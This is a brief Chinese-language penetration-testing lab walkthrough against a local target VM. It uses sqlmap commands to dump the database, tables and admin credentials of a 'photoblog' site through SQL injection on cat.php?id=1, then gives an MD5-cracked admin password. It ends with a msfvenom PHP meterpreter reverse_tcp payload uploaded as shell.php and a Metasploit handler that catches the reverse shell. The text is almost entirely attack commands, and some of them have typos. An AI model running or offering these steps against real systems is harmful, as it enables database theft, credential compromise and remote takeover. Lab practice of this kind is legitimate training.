靶機地址:192.168.43.156
攻擊機地址:192.168.43.89
一、AppScan檢查靶機sql漏洞

二、使用sqlmap利用SQL注入漏洞
1.sqlmap -u "
http://192.168.43.156/cat.php?id=1" –dbs 查看數據庫名

2.sqlmap -u "
http://192.168.43.156/cat.php?id=1" -D "photoblog" --tables 表名

3.sqlmap -u "
http://192.168.43.156/cat.php?id=1" -D "photoblog" T "user" --columns 查看字段

4.sqlmap -u "
http://192.168.43.156/cat.php?id=1" -D "photoblog" T "user" -C "login" --dump

用同種方法查找密碼
三、建立反彈shell
msfvenom -p php/meterpreter/reverse_tcp lhost=攻擊機IP地址 lport=4444 -f raw

在桌面建一個文件shell.php

四、登錄后台頁面
剛在數據庫拿到的用戶名:admin
密碼需要用MD5解密為:
P4ssw0rd


在kali系統內
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻擊機IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
在頁面運行shell就可以就如靶機